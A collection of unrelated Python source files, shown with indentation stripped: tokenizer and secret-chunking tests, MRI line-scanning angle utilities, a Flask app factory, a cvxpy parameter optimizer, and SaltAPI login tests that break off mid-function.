"ar",
"viņu",
"apieties",
"vai",
"sodīt",
".",
],
),
]
@pytest.mark.parametrize("text,expected_tokens", LV_BASIC_TOKENIZATION_TESTS)
def test_lv_tokenizer_basic(lv_tokenizer, text, expected_tokens):
tokens = lv_tokenizer(text)
token_list = [token.text for token in tokens if not token.is_space]
assert expected_tokens == token_list
|
from .markov import MarkovImage
from .scanner import ImageScanner
from .traversal import Traversal, HLines, VLines, Spiral, Blocks, Hilbert
from .type import ImageType, RGB, Grayscale, Indexed
from ..scanner import Scanner
from ..parser import Parser, LevelParser
Scanner.add_class(ImageScanner)
Traversal.add_class(HLines, VLines, Spiral, Blocks, Hilbert)
ImageType.add_class(RGB, Grayscale, Indexed)
|
import os, sys, cdms2, vcs, vcs.testing.regression as regression
baselineName = sys.argv[1]
projection = sys.argv[2]
zoom = sys.argv[3]
f = cdms2.open(vcs.sample_data + "/clt.nc")
a = f("clt")
x = regression.init()
p = x.getprojection(projection)
b = x.createboxfill()
b.projection = p
if (zoom == 'none'):
x.plot(a(latitude=(90,-90)), b, bg=1)
elif (zoom == 'subset'):
x.plot(a(latitude=(-50,90), longitude=(30, -30)), b, bg=1)
else:
b.datawc_x1 = 30
b.datawc_x2 = -30
b.datawc_y1 = -50
b.datawc_y2 = 90
x.plot(a, b, bg=1)
fileName = os.path.basename(baselineName)
fileName = os.path.splitext(fileName)[0]
fileName += '.png'
regression.run(x, fileName)
|
from upside.enforcer import config
from upside.enforcer.upload.chunks import chunk_secret_value, adjust_chunk_size
from upside.enforcer.upload.util import add_existing_secrets_to_secret_store
from upside.enforcer.util.secret import Secret
def test_chunking():
chunks = chunk_secret_value('abcdef', 1)
assert len(chunks) == 6
assert chunks[0] == 'a'
assert chunks[1] == 'b'
assert chunks[2] == 'c'
assert chunks[3] == 'd'
assert chunks[4] == 'e'
assert chunks[5] == 'f'
def test_adjust_chunk_size_does_not_change():
store = {
'test_chunk_000': 'a',
'test_chunk_001': 'b',
'test_chunk_002': 'c',
'test_chunk_003': 'd',
'test_chunk_004': 'e',
'test_chunk_005': 'f'
}
original_chunks = chunk_secret_value('abcdef', 1)
updated_chunks = adjust_chunk_size(original_chunks, store)
for idx, chunk in enumerate(updated_chunks):
assert original_chunks[idx] == chunk
def test_adjust_chunk_size_reduction():
store = {
'test_chunk_000': 'a',
'test_chunk_001': 'b',
'test_chunk_002': 'c',
'test_chunk_003': config.CHUNK_TERMINATION_VALUE,
'test_chunk_004': config.CHUNK_TERMINATION_VALUE,
'test_chunk_005': config.CHUNK_TERMINATION_VALUE
}
original_chunks = chunk_secret_value('abc', 1)
updated_chunks = adjust_chunk_size(original_chunks, store)
for idx, chunk in enumerate(updated_chunks):
assert original_chunks[idx] == chunk
def test_adjust_chunk_size_increase():
store = {
'test_chunk_000': 'a',
'test_chunk_001': 'b',
'test_chunk_002': 'c',
'test_chunk_003': config.CHUNK_TERMINATION_VALUE,
'test_chunk_004': config.CHUNK_TERMINATION_VALUE,
'test_chunk_005': config.CHUNK_TERMINATION_VALUE
}
original_chunks = chunk_secret_value('abcdefg', 1)
updated_chunks = adjust_chunk_size(original_chunks, store)
assert len(updated_chunks) == 7
assert updated_chunks[0] == 'a'
assert updated_chunks[1] == 'b'
assert updated_chunks[2] == 'c'
assert updated_chunks[3] == 'd'
assert updated_chunks[4] == 'e'
assert updated_chunks[5] == 'f'
assert updated_chunks[6] == 'g'
def test_add_existing_chunks_to_secret_store():
store = {}
aws_chunked_secrets = []
secret = Secret(key='/parent/child', value='test')
chunks = chunk_secret_value('abcdef', 1)
for idx, chunk in enumerate(chunks):
aws_chunked_secrets.append({'Name': '/parent/child' + '_chunk_' + "{:03d}".format(idx), 'Value': chunk})
add_existing_secrets_to_secret_store({'Parameters': aws_chunked_secrets}, store, secret)
assert len(store) == 6
for idx, key_value in enumerate(store.items()):
assert key_value[0] == secret.name + '_chunk_' + "{:03d}".format(idx)
assert key_value[1] == chunks[idx]
def test_add_existing_chunks_to_secret_store_wrong_key():
store = {}
aws_chunked_secrets = []
secret = Secret(key='/parent/step_child', value='test')
chunks = chunk_secret_value('abcdef', 1)
for idx, chunk in enumerate(chunks):
aws_chunked_secrets.append({'Name': '/parent/child' + '_chunk_' + "{:03d}".format(idx), 'Value': chunk})
add_existing_secrets_to_secret_store({'Parameters': aws_chunked_secrets}, store, secret)
assert len(store) == 0
|
import os
import numpy as np
from linescanning import utils
import pandas as pd
def correct_angle(x, verbose=False, only_angles=True):
"""correct_angle
This function converts the angles obtained with normal2angle to angles that we can use on the scanner. The scanner doesn't like angles >45 degrees. If inserted, it will flip all kinds of parameters such as slice orientation and foldover.
Parameters
----------
x: float, numpy.ndarray
generally this should be literally the output from normal2angle, a (3,) array containing the angles relative to each axis.
verbose: bool
print messages during the process (default = False)
only_angles: bool
if we are getting the angles for real, we need to decide what the angle with the z-axis means. We do this by returning an additional variable 'z_axis_represents_angle_around' so that we know in :func:`linescanning.utils.get_console_settings` where to place this angle. By default this is false, and it will only return converted angles. When doing the final conversion, the real one, turn this off (default = True).
Returns
----------
numpy.ndarray
scanner representation of the input angles
str
if <only_angles> is set to False, it additionally returns an "X" or "Y", which specifies around which axis (X or Y) the angle with the z-axis is to be used
"""
if isinstance(x, np.ndarray) or isinstance(x, list):
scanner_angles = np.zeros((3,))
# set boolean for flipping RL angle in case of sagittal slice
flip = False
# flag for true coronal slice (i.e., angle with Y is already set to zero in scanner.Scanner())
true_cor = False
true_sag = False
# the angle with the z-axis can be interpreted in terms of angle AROUND Y (AP) AND AROUND X (RL)
# If the slice is in the sweetspot of coronal slices, we can interpret the angle WITH the z-axis
# as angle AROUND the Y (AP) axis. Otherwise we need to interpret it as the angle AROUND the X
# axis (RL)
z_axis_represents_angle_around = "Y"
# for good coronal slices, there are basically for options:
# 1) Large X | Large Y > vector = center to top-left (use angle as is)
# 2) Small X | small Y > vector = center to bottom-right (use angle as is)
# 3) Small X | Large Y > vector = center to top-right (flip sign)
# 4) Large X | Small Y > vector = center to bottom-left (flip sign)
#-------------------------------------------------------------------------------------------------------------------------------
# deal with x-axis
if 0 <= x[0] <= 45: # here we can decide on case 2 and 3 (small X's)
# 1) angles living between 0 deg and 45 deg can freely do so, nothing to update > most likely coronal slice
scanner_angles[0] = x[0]
# case 3) Small X | Large Y >> flip angle
if x[1] >= 90:
# in this situation, we can have two lines, mirrored over the RL-axis. The only thing that separates them is the angle with
# the Y-axis. If this is a large angle, we should have a negative value for the X-angle. If this is a small angle, this means
# we should have a positive value for the X-angle
scanner_angles[0] = utils.reverse_sign(scanner_angles[0])
if verbose:
print(f" Case 3 holds: Small X ({round(x[0],2)}) | Large Y ({round(x[1],2)})")
else:
# case 2) Small X | small Y >> use angle as is
if verbose:
print(f" Case 2 holds: Small X ({round(x[0],2)}) | Small Y ({round(x[1],2)})")
else:
pass
elif 45 <= x[0] <= 90:
# 2) these angles are a bit tricky. This means we're outside of the range for coronal slices, so we insert
# the corrected value into the second position and set position 1 to 0
# theoretically we could have a bang on coronal slice. In that case the y-axis angle
# has been set to zero and the angle with the x-axis represents the angle around the AP
# axis.
if x[1] != 0:
scanner_angles[0] = 999 # code for sag slice
scanner_angles[1] = x[0]-90
if verbose:
print(" No coronal cases hold: we'll get a sagittal slice")
sag_slice = True
else:
# if the y-angle is already set to zero, it means we have a coronal slice. This means the only
# angle we need it this angle. It will deal with the foldover in utils.get_console_settings
scanner_angles[0] = x[0]
scanner_angles[1] = 998 # code for fully 90 deg slice
true_cor = True
if verbose:
print(" We're dealing with a purely coronal slice. Only X-angle is required")
elif 90 <= x[0] <= 180: # here we can decide on case 1 and 4 (large X's)
# 3) such angles would mean we have a vector pointing in the opposite direction of case 1). We simply subtract
# it from 180 degrees
scanner_angles[0] = 180-x[0]
# case 1) Large X | Large Y >> use angle as is
if x[1] >= 90:
if verbose:
print(f" Case 1 holds: Large X ({round(x[0],2)}) | Large Y ({round(x[1],2)})")
else:
pass
else:
# case 4) Large X | Small Y >> flip angle
scanner_angles[0] = utils.reverse_sign(scanner_angles[0])
if verbose:
print(f" Case 4 holds: Large X ({round(x[0],2)}) | Small Y ({round(x[1],2)})")
# in case we have a sagittal slice, the RL-angle decides the direction of the vector. A center-topright
# vector is created with a positive value. This is decided by the RL-angle: a large RL angle means we have a
# center-topleft vector, a small RL angle means we have a center-topright vector.
flip = True
# if the above resulted in a sagittal slice, we need to convert the angles relative to the AP-axis. We have the
# angle with the RL-axis, scanner_angles[0], and the angle with the AP-axis then is 90-angle_RL. Because of the
# way the scanner interprets this, a center-topleft vector is created with the -(90-angle_RL).
#
# First we check if we have a sagittal slice; if so, the XY-angles are already sorted
if scanner_angles[0] == 999:
z_axis_represents_angle_around = "X"
else:
if 45 <= scanner_angles[0] <= 90:
# Convert angle with x-axis to be compatible with sagittal slice
if x[1] != 0:
scanner_angles[1] = 90-scanner_angles[0]
scanner_angles[0] = 999 # code for sagittal
# overwrite the angle around the axis that is represented by the angle with the Z-axis
z_axis_represents_angle_around = "X"
# decide on the direction of the sagittal slice, center-topleft or center-topright depending on what the
# initial angle with the x-axis was. Big angle means center-topleft, small angle means center-topright
if flip == True:
if verbose:
print(f" X angle was large ({round(x[0],2)}), inverting {round(scanner_angles[1],2)}")
print(f" Z angle = angle around RL-axis")
scanner_angles[1] = utils.reverse_sign(scanner_angles[1])
else:
if verbose:
print(f" X angle was small ({round(x[0],2)}), using {round(scanner_angles[1],2)} as is")
else:
pass
else:
if verbose:
print(f" Z angle = angle around AP-axis")
else:
pass
#-------------------------------------------------------------------------------------------------------------------------------
# now, if we found a suitable angle for X, we can ignore Y because we only need one of the two to get our line
# we could've obtained the Y-angle above if the X-angle was in the 45-90 range. In that case the first two positions
# are already filled.
#
if x[0] == 0:
# set straight to true sagittal slice
scanner_angles[1] = x[1]
true_sag = True
scanner_angles[0] = 998 # code for full sagittal
# overwrite the angle around the axis that is represented by the angle with the Z-axis
z_axis_represents_angle_around = "X"
if verbose:
print(" We're dealing with a purely sagittal slice. Only Y-angle is required")
elif scanner_angles[0] <= 45:
scanner_angles[1] = 0
elif scanner_angles[0] == 999:
# we've already corrected this angle if we have a sagittal slice
pass
else:
# deal with y-axis; same rules as for the x-axis apply
# we did not manage to get a good angle for X, so we need to convert the angle of Y relative to the AP axis
if 0 <= x[1] <= 45:
# 1) angles living between 0 deg and 45 deg can freely do so, nothing to update > most likely coronal slice
scanner_angles[1] = x[1]
elif 45 <= x[1] <= 90:
# 2) these angles are a bit tricky.
scanner_angles[1] = 90-x[1]
elif 90 <= x[1] <= 180:
# 3) such angles would mean we have a vector pointing in the opposite direction of case 1). We simply subtract
# it from 180 degrees
scanner_angles[1] = 180-x[1]
#-------------------------------------------------------------------------------------------------------------------------------
# deal with z-axis > this is a special angle as it can reflect an angle around the Z-axis OR the Y-axis, depending on
# the slice orientation. If slice == coronal > z-axis = angle AROUND Y-axis. If slice == sagittal > z-axis is angle
# around X-axis. Previously we've also flattened this angle to the YZ-plane, so it's now a planar angle.
# The angle with the z-axis starts at 0, where it points in the superior direction [0,0,1]. It then starts to rotate
# down towards the inferior axis [0,0,-1]. The start = 0 deg, the y-axis is the 90 deg mark, and inferior axis = 180.
# The scanner interprets these angles from -45 (DOWN/UP lines) to 45 (UP/DOWN) degrees. Other angles will be wrapped.
if true_cor == False and true_sag == False:
# we need to do something with the z-axis
if -45 <= x[2] <= 45:
# 1) angles living between 0 deg and 45 deg can freely do so, nothing to update > most likely coronal slice
scanner_angles[2] = x[2]
elif 45 <= x[2] <= 90:
# 2) these angles are a bit tricky. Here is means that the foldover direction is changed too
scanner_angles[2] = x[2]-90
elif 90 <= x[2] <= 180:
# 3) such angles would mean we have a vector pointing in the opposite direction of case 1). We simply subtract
# it from 180 degrees
scanner_angles[2] = 180-x[2]
flip = True
# check if we should have the opposite angle of the one we got.
if 45 <= scanner_angles[2] <= 90:
# this means we got the angle proximal to the vector and Z-axis. We need to opposite one
scanner_angles[2] = 90-scanner_angles[2]
if flip == True:
# depending on whether the initial angle was big, we need to invert the sign to be compatible
# with the scanner
scanner_angles[2] = utils.reverse_sign(scanner_angles[2])
else:
scanner_angles[2] = x[2]
# return the result
if only_angles == True:
return scanner_angles
else:
return scanner_angles, z_axis_represents_angle_around
def normal2angle(normal, unit="deg", system="RAS", return_axis=['x','y','z']):
"""normal2angle
Convert the normal vector to angles representing the angle with the x,y,z axis. This can be done by taking the arc cosine over the dot product of the normal vector and a vector representing the axis of interest. E.g., the vector for x would be [1,0,0], for y it would be [0,1,0], and for z it would be [0,0,1]. Using these vector representations of the axis we can calculate the angle between these vectors and the normal vector. This results in radians, so we convert it to degrees by multiplying it with 180/pi.
Parameters
----------
normal: numpy.ndarray, list
array or list-like representation of the normal vector as per output of pycortex or FreeSurfer (they will return the same normals)
unit: str
unit of angles: "deg"rees or "rad"ians (default = "deg")
system: str
coordinate system used as reference for calculating the angles. A right-handed system is default (RAS)
see: http://www.grahamwideman.com/gw/brain/orientation/orientterms.html. The scanner works in LPS, so we'd need to define the x/y-axis differently to get correct angles (default = "RAS").
return_axis: list
List of axes to return the angles for. For some functions we only need the first two axes, which we can retrieve by specifying 'return_axes=['x', 'y']' (default = ['x','y','z']).
Returns
----------
list
list-like representation of the angles with each axis, first being the x axis, second the y axis, and third the z-axis.
Notes
----------
Convert angles to sensible plane: https://www.youtube.com/watch?v=vVPwQgoSG2g: angles obtained with this method are not coplanar; they don't live in the same space. So an idea would be to decompose the normal vector into it's components so it lives in the XY-plane, and then calculate the angles.
"""
vector = np.zeros((3))
vector[:len(normal)] = normal
# convert to a unit vector in case we received an array with 2 values
vector = utils.convert2unit(vector)
# print(f"Vector = {vector}")
# Define empty 3x3 array to be filled with 1's or -1's depending on requested coordinate system
COORD_SYS = np.eye(3)
if system.upper() == "RAS":
np.fill_diagonal(COORD_SYS, [1,1,1])
elif system.upper() == "LPS":
np.fill_diagonal(COORD_SYS, [-1,-1,1])
else:
raise NotImplementedError(f"You requested a(n) {system.upper()} system, but I can only deal with 'LPS' or 'RAS' for now")
# this works if both vectors are normal vectors; otherwise this needs to be scaled by the dot-product of both vector
# magnitudes
angles = np.arccos(vector @ COORD_SYS)
# convert to degree or radian
if unit == "deg":
angles = angles*(180/np.pi)
# we don't always need all axes to be returned, but we do so by default.
# Specify some options below.
if return_axis == ['x','y','z']:
return angles
elif return_axis == ['x','y']:
return angles[:2]
elif return_axis == ['y','z']:
return angles[:-2]
elif return_axis == ['x']:
return angles[0]
elif return_axis == ['y']:
return angles[1]
elif return_axis == ['z']:
return angles[2]
else:
raise NotImplementedError(f"Requested angles were '{return_axis}', this has not yet been implemented")
def get_console_settings(angles, hemi, idx, z_axis_meaning="Y"):
"""get_console_settings
Function that outputs what is to be inserted in the MR console. This function is the biggest source of misery during my PhD so far. Needs thorough investigation. The idea is pretty simple: we have a set of angles obtained from normal2angle, we have converted them to angles that the scanner can understand (i.e., angles <45 degrees), and now we need to derive which ones to use in order to place the line along the normal vector.
Parameters
----------
angles: np.ndarray
literally the output from correct_angles, a (3,) numpy array with the 'corrected' angles
hemi: str
should be "L" or "R", is mainly for info reason. It's stored in the dataframe so we can use it to index
idx: int
this should be the integer representing the selected vertex. This is also only stored in the dataframe. No operations are executed on it
z_axis: str
this string specifies how to interpret the angle with the z-axis: as angle around the X (RL) or Y (AP) axis. This can be obtained by turning off <only_angles> in :func:`linescanning.utils.correct_angle`. By default it's set to 'Y', as that means we're dealing with a coronal slice; the most common one. Though we can also get sagittal slices, so make sure to do this dilligently.
foldover: str
foldover direction of the OVS bands. Generally this will be FH, but there are instances where that does not apply. It can be returned by `linescanning.utils.correct_angle(foldover=True)`
Returns
----------
pd.DataFrame
a dataframe containing the information needed to place the line accordingly. It tells you the foldover direction, slice orientation, and angles
"""
# Get index of smallest angle
# min_angle = np.argmin(abs(angles))
print(f"Dealing with hemisphere: {hemi}")
foldover = "FH"
# print(min_angle)
angle_x,angle_y,angle_z = angles[0],angles[1],angles[2]
# also see comments in 'correct_angle' for an explanation of what is happening, but in short:
# - based on the angle between the normal vector and the x-axis [-1,0,0] we decided whether
# we have a coronal or sagittal slice. Is the angle between 0-45, then we have a coronal
# slice, if it's between 45-90 degrees, we have a sagittal slice and the first angle is
# set to zero
#
# - here we will first check if the first angle is zero. As said, if that's the case we have
# a sagittal slice.
#
# - because the scanner flips the use of (counter)clockwise-ness, we need to flip the angles
# for the XY-angles. The Z-angles are interpreted correctedly (negative = UP, positive =
# DOWN)
#
# Decide on the slice
if angle_x != 999:
# coronal slice
orientation = 'coronal'
angle_fh = angle_x
# check if we should do something with the foldover in a coronal slice. This happens when the angle with the
# z-axis is lower than -45 or larger than 45. We should then flip the angle and change the foldover.
if angle_fh <= -45:
print(f" Angle around Y-axis = {angle_fh}; adding 90 deg & setting orientation to sagittal")
angle_fh += 90
orientation = "sagittal"
elif angle_fh >= 45:
print(f" Angle around Y-axis = {angle_fh}; substracting 90 deg & setting orientation to sagittal")
angle_fh -= 90
orientation = "sagittal"
# if the angle with the z-axis was large, we need to invert the angle (means right-pointing vector)
if angle_z >= 90:
angle_fh = utils.reverse_sign(angle_fh)
else:
orientation = 'sagittal'
angle_fh = angle_y
# print(f"Angle FH = {round(angle_y,2)}")
# check if we should do something with the foldover in a sagittal slice. This happens when the angle with the
# z-axis is lower than -45 or larger than 45. We should then flip the angle and change the foldover.
if angle_fh <= -45:
print(f" Angle around X-axis = {round(angle_fh,2)}; adding 90 deg & setting foldover to AP")
angle_fh += 90
foldover = "AP"
elif angle_fh >= 45:
print(f" Angle around X-axis = {round(angle_fh,2)}; adding 90 deg & setting foldover to AP")
# angle_fh -= 90
foldover = "AP"
# if the angle with the z-axis was large, we need to invert the angle (means down-pointing vector)
if angle_z >= 90:
angle_fh = utils.reverse_sign(angle_fh)
# if we have a sagittal slice, the angle with the z-axis represents the angle around the x-axis
# if we have a coronal slice, the angle with the z-axis represents the angle around the y-axis
# you can see how this makes sense by using your phone and place is coronally, and sagittally,
# then rotate with the angle with the z-axis that invisibly points to your ceiling
#
# Sometimes we also give a big angle as z-axis to know what way the vector is pointing. In that
# case the angle is not actually used for the console.
if not 998 in angles:
if z_axis_meaning.upper() == "Y":
angle_ap = angle_z
angle_lr = 0
elif z_axis_meaning.upper() == "X":
angle_ap = 0
angle_lr = angle_z
else:
raise ValueError(f"Z-axis means an angle around the {z_axis_meaning.upper()} axis?? Needs to be 'X' or 'Y'")
else:
angle_lr = 0
angle_ap = 0
data = {"parameter": ["orientation", "foldover", "vertex", "LR_rot", "AP_rot", "FH_rot"],
"value": [orientation, foldover, idx, angle_lr, angle_ap, angle_fh]}
df = pd.DataFrame(data)
df['hemi'] = hemi
return df
def rotate_normal(norm, xfm, system="RAS"):
"""rotate_normal
Applies the rotation part of an affine matrix to the normal vectorself.
Parameters
----------
norm: numpy.ndarray
(3,) or (4,) array; If (4,) array, the last value should be set to zero to avoid translations
xfm: numpy.ndarray, str
(4,4) affine numpy array or string pointing to the matrix-file, can also be 'identity', in which case np.eye(4) will be used. This is handy for planning the line in session 1/FreeSurfer space
system: str
use RAS (freesurfer) or LPS (ITK) coordinate system. This is important as we need to apply the matrix in the coordinate system that the vector is living in. e.g., RAS vector = RAS matrix (not ANTs' default), LPS vector = LPS matrix. If LPS, then :func:`linescanning.utils.get_matrixfromants` is used, otherwise the matrix is first converted to ras with `ConvertTransformFile` and then read in with `np.loadtxt`.
Example
----------
>>> rotate_normal(normal_vector, xfm, system="LPS")
Notes
----------
The results of LPS_vector @ LPS_matrix is the same as RAS_vector @ RAS_matrix
"""
import numpy as np
if isinstance(xfm, str):
if system.upper() == "RAS":
if xfm != "identity":
xfm_tmp = xfm.split('.')[0]+"_ras.txt"
os.system(f"ConvertTransformFile 3 {xfm} {xfm_tmp} --ras --hm")
xfm = np.loadtxt(xfm_tmp)
else:
xfm = np.eye(4)
# os.remove(xfm_tmp)
else:
xfm = utils.get_matrixfromants(xfm)
# if len(norm) == 3:
# norm = np.append(norm,[0])
# elif len(norm) == 4:
# if norm[3] != 0:
# raise ValueError("The last value of array is not zero; this results in translations in the normal vector. Should be set to 0!")
# else:
# raise ValueError(f"Odd number of elements in array.. Vector = {norm}")
rot_norm = norm@xfm[:3,:3]
return rot_norm[:3]
def single_hemi_line_pycortex(normal, hemi, idx, coord=None):
"""create the line_pycortex portion of 1 hemisphere"""
angles = normal2angle(normal)
# Write the rotations describing the orientation of the line in the first session anatomy to a text file
if isinstance(coord, list) or isinstance(coord, np.ndarray):
data = {"hemi": [hemi],
"index": [int(round(idx,0))],
"LR_rot": [angles[0]],
"AP_rot": [angles[1]],
"FH_rot": [angles[2]],
"normal": [normal],
"position": [coord]}
else:
data = {"hemi": [hemi],
"index": [int(round(idx,0))],
"LR_rot": [angles[0]],
"AP_rot": [angles[1]],
"FH_rot": [angles[2]],
"position": [coord]}
df = pd.DataFrame(data)
return df
|
import pytest
import os.path
import logging
from cryptography import x509
from cryptography.hazmat.primitives.asymmetric import rsa
from commandment.pki.models import RSAPrivateKey, CACertificate
logger = logging.getLogger(__name__)
class TestORMUtils:
def test_find_recipient(self, certificate):
pass
|
import logging
from logging.handlers import RotatingFileHandler
import os
from flask import Flask, request, current_app
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
from flask_moment import Moment
from config import Config
db = SQLAlchemy()
login = LoginManager()
moment = Moment()
def creat_app(config_class=Config):
app = Flask(__name__)
app.config.from_object(config_class)
db.init_app(app)
login.init_app(app)
moment.init_app(app)
from app.main import bp as main_bp
#app.register_blueprint(main_bp, url_prefix='/')
app.register_blueprint(main_bp)
from app.admin import bp as github_bp
app.register_blueprint(github_bp)
#根据生产环境决定是否保存logs信息
if not app.debug:
logs_file_handler = RotatingFileHandler(
os.path.join(app.config['LOG_OUTPUT_PATH'], 'app.log'),
maxBytes=10240, backupCount=10)
logs_file_handler.setFormatter(logging.Formatter(
'%(asctime)s %(levelname)s: %(message)s'
'[in %(pathname)s: %(lineno)s]'))
logs_file_handler.setLevel(logging.INFO)
app.logger.addHandler(logs_file_handler)
app.logger.setLevel(logging.INFO)
app.logger.info('Mr.Bean is coming')
return app
from app import models
|
"""
*
* Copyright (c) 2021 Manuel Yves Galliker
* 2021 Autonomous Systems Lab ETH Zurich
* All rights reserved.
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
* 3. Neither the name Data Driven Dynamics nor the names of its contributors may be
* used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
* ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*
"""
__author__ = "Manuel Yves Galliker"
__maintainer__ = "Manuel Yves Galliker"
__license__ = "BSD 3"
from src.optimizers import OptimizerBaseTemplate
import cvxpy
import numpy as np
import pandas as pd
import warnings
from src.tools import math_tools
from sklearn.metrics import r2_score
class QPOptimizer(OptimizerBaseTemplate):
def __init__(self, optimizer_config, param_name_list, verbose=False):
super(QPOptimizer, self).__init__(optimizer_config, param_name_list)
print("Define and solve problem:")
print("min_c (X * c -y)^T * (X * c -y)")
print(" s.t. G * c <= h")
print("Initialized with the following coefficients: ")
print(param_name_list)
self.verbose = verbose
self.n = len(param_name_list)
self.param_name_list = param_name_list
if "parameter_bounds" in self.config:
self.__compute_ineq_contraints()
else:
warnings.warn("You have selected the QPOptimizer for linear models with \
bound constrains but have not specified any bounds. \
Consider switching to LinearRegression for unconstraint parameter estimation.")
self.G = np.zeros(
(1, len(param_name_list)))
self.h = np.zeros(1)
def __compute_ineq_contraints(self):
param_bounds = self.config["parameter_bounds"]
param_bnd_keys = list(param_bounds.keys())
# assert (len(param_bnd_keys) ==
# self.n), "Optimizer needs exactly one bound per coefficient"
self.G = []
self.h = []
self.fixed_coef_index_list = []
self.fixed_coef_value_list = []
self.optimization_coef_list = []
self.fixed_coef_list = []
for i in range(self.n):
current_param = self.param_name_list[i]
try:
current_bnd_tuple = param_bounds[current_param]
except IndexError:
print("Can not find bounds for parameter " +
current_param + " in config file.")
if (current_bnd_tuple[0] == current_bnd_tuple[1]):
self.fixed_coef_index_list.append(i)
self.fixed_coef_value_list.append(current_bnd_tuple[0])
self.fixed_coef_list.append(current_param)
else:
self.G.append(-self.index_row(i))
self.G.append(self.index_row(i))
self.h.append(-current_bnd_tuple[0])
self.h.append(current_bnd_tuple[1])
self.optimization_coef_list.append(current_param)
self.G = np.array(self.G)
self.h = np.array(self.h)
self.n_fixed_coef = len(self.fixed_coef_index_list)
self.n_opt_coef = self.n - self.n_fixed_coef
for i in range(self.n_fixed_coef):
reversed_index = self.n_fixed_coef - i - 1
self.G = np.delete(
self.G, self.fixed_coef_index_list[reversed_index], 1)
print("Fixed Coefficients: Value")
for fixed_coef in self.fixed_coef_list:
print(fixed_coef + ": ", param_bounds[fixed_coef][0])
print("-------------------------------------------------------------------------------")
print("Bounded Coefficients: (Min Value, Max Value)")
for opt_coef in self.optimization_coef_list:
print(opt_coef + ": ", param_bounds[opt_coef])
if self.verbose:
print(
"-------------------------------------------------------------------------------")
print(
" Constraints matrices ")
print(
"-------------------------------------------------------------------------------")
print(self.G)
print(self.h)
def index_row(self, i):
index_row = np.zeros(self.n)
index_row[i] = 1
return index_row
def remove_fixed_coef_features(self, X, y):
# remove elements starting from the back
for i in range(self.n_fixed_coef):
reversed_index = self.n_fixed_coef - i - 1
coef_index = self.fixed_coef_index_list[reversed_index]
print(self.fixed_coef_index_list)
print(coef_index)
print(self.n)
print(X.shape)
y = y - (X[:, coef_index] *
self.fixed_coef_value_list[reversed_index]).flatten()
X = np.delete(X, coef_index, 1)
return X, y
def insert_fixed_coefs(self, c_opt):
print(c_opt)
c_opt = list(c_opt)
for i in range(len(self.fixed_coef_index_list)):
c_opt.insert(
self.fixed_coef_index_list[i], self.fixed_coef_value_list[i])
return c_opt
def estimate_parameters(self, X, y):
"""
Define and solve the CVXPY problem.
min_c (X * c -y)^T * (X * c -y)
s.t. G * c <= h
"""
# remove fixed coefficients from problem formulation
self.X = X
self.y = y
self.check_features()
self.X_reduced, self.y_reduced = self.remove_fixed_coef_features(X, y)
self.y = y
c = cvxpy.Variable(self.n_opt_coef)
cost = cvxpy.sum_squares(self.X_reduced @ c - self.y_reduced)
self.prob = cvxpy.Problem(cvxpy.Minimize(cost), [self.G @ c <= self.h])
self.prob.solve(verbose=self.verbose)
self.c_opt = np.array(self.insert_fixed_coefs(
c.value)).reshape((self.n, 1))
self.estimation_completed = True
def set_optimal_coefficients(self, c_opt, X, y):
self.X = X
self.y = y
self.c_opt = np.array(c_opt).reshape((self.n, 1))
self.estimation_completed = True
def get_optimization_parameters(self):
self.check_estimation_completed()
return list(self.c_opt)
def predict(self, X_pred):
self.check_estimation_completed()
y_pred = np.matmul(X_pred, self.c_opt)
return y_pred.flatten()
def compute_optimization_metrics(self):
self.check_estimation_completed()
y_pred = self.predict(self.X)
metrics_dict = {
"RMSE": math_tools.rmse_between_numpy_arrays(y_pred, self.y),
"R2": float(r2_score(self.y, y_pred))
}
if self.verbose:
metrics_dict["Dual Variables"] = (
self.prob.constraints[0].dual_value).tolist()
return metrics_dict
|
import ast
import base64
import json
import requests
import pytest
from pytest_bdd import parsers, scenario, then, when
# Scenario {{{
@scenario('../features/salt_api.feature', 'Login to SaltAPI using Basic auth')
def test_login_basic_auth_to_salt_api(host):
pass
@scenario('../features/salt_api.feature',
'Login to SaltAPI using an admin ServiceAccount')
@scenario('../features/salt_api.feature',
'Login to SaltAPI using a ServiceAccount')
def test_login_bearer_auth_to_salt_api(host):
pass
@pytest.fixture(scope='function')
def context():
return {}
# }}}
# When {{{
@when(parsers.parse(
"we login to SaltAPI as '{username}' using password '{password}'"))
def login_salt_api_basic(host, username, password, version, context):
address = _get_salt_api_address(host, version)
token = base64.encodebytes(
'{}:{}'.format(username, password).encode('utf-8')
).rstrip()
context['salt-api'] = _salt_api_login(address, username, token, 'Basic')
@when("we login to SaltAPI with an admin ServiceAccount")
def login_salt_api_admin_sa(host, k8s_client, admin_sa, version, context):
sa_name, sa_namespace = admin_sa
address = _get_salt_api_address(host, version)
context['salt-api'] = _login_salt_api_sa(
address, k8s_client,
sa_name, sa_namespace
)
@when(parsers.parse(
"we login to SaltAPI with the ServiceAccount '{account_name}'"))
def login_salt_api_system_sa(host, k8s_client, account_name, version, context):
address = _get_salt_api_address(host, version)
context['salt-api'] = _login_salt_api_sa(
address, k8s_client,
account_name, 'kube-system'
)
# }}}
# Then {{{
@then('we can ping all minions')
def ping_all_minions(host, context):
result = requests.post(
context['salt-api']['url'],
